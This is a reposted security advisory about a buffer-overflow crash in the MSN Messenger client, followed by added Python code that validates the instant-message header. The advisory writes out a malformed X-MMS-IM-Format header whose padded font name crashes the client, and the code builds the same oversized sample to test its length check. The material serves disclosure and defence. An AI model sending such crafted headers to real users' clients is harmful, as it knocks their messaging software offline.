Another serious MSN Messenger flaw
From BugTraq:
Introduction to the flaw.
MSN Messenger is a popular Instant-Messaging client from
Microsoft. After the previous flaws regarding the privacy
of users, another flaw has been discovered. This flaw makes the
MSN Messenger client crash after receiving a malformed
font variable in the message header of an instant message.
How does it work exactly?
The MSN Messenger client works by sending a header with
every message. So every time a user wants to send a
message, it generates a header containing information
about the font, the color of the message and some other
information.
The flaw
A normal header looks something like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
When we replace the font field with something very large,
creating an overflow, the header will look like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
As a result the MSN Messenger client will crash.
This flaw only crashes Microsoft's MSN Messenger;
Trillian is not affected.
This flaw is a severe danger, as it is not so hard for
hackers to use this flaw in their application.
Microsoft has been informed on this issue.
When are people GOING TO LEARN about buffer overflows? I wonder how many more holes exist in MSN Messenger?
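As an added example that is not part of the advisory or of Microsoft's client, the input check a receiving client should apply to the header described above: it parses the X-MMS-IM-Format line into its fields and refuses a message whose decoded FN value exceeds an assumed 32-character cap (the advisory gives no figure), so the normal header is accepted and the padded-out one is dropped instead of being handed to the font code. The sample messages are constructed here to match the advisory's layout.

```python
from urllib.parse import unquote

MAX_FONT_NAME = 32  # assumed cap on a decoded font name; the advisory names no figure
FORMAT_KEYS = {"FN", "EF", "CO", "CS", "PF"}  # keys seen in the advisory's sample header

# Constructed sample in the shape of the advisory's normal header (not captured traffic).
NORMAL_MSG = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22\r\n"
    "\r\nhey friend, how are you?"
)
# Same message with the font name padded out with %20, as in the advisory's crash case.
OVERSIZED_MSG = NORMAL_MSG.replace(
    "FN=MS%20Sans%20Serif", "FN=Times" + "%20" * 40 + "New%20Roman"
)


def parse_format_field(value: str) -> dict:
    """Parse 'FN=...; EF=B; CO=ff; ...' into a dict, bounding the decoded font name."""
    fmt = {}
    for item in value.split(";"):
        item = item.strip()
        if not item:
            continue
        key, eq, val = item.partition("=")
        if not eq or key not in FORMAT_KEYS:
            raise ValueError(f"unexpected format item: {item!r}")
        fmt[key] = val
    font = unquote(fmt.get("FN", ""))  # %20 -> space, as the client would decode it
    if len(font) > MAX_FONT_NAME:
        raise ValueError(f"font name too long: {len(font)} chars, max {MAX_FONT_NAME}")
    fmt["FN"] = font
    return fmt


def parse_im_message(raw: str) -> dict:
    """Split an IM message into headers and body; raise ValueError on a bad font field."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("message has no header/body separator")
    headers = {}
    for line in head.split("\r\n"):
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"bad header line: {line!r}")
        headers[name.strip()] = value.strip()
    fmt = parse_format_field(headers.get("X-MMS-IM-Format", ""))
    return {"headers": headers, "format": fmt, "body": body}


def accepts(raw: str) -> bool:
    """True if the message passes validation, False if the client should drop it."""
    try:
        parse_im_message(raw)
        return True
    except ValueError:
        return False
```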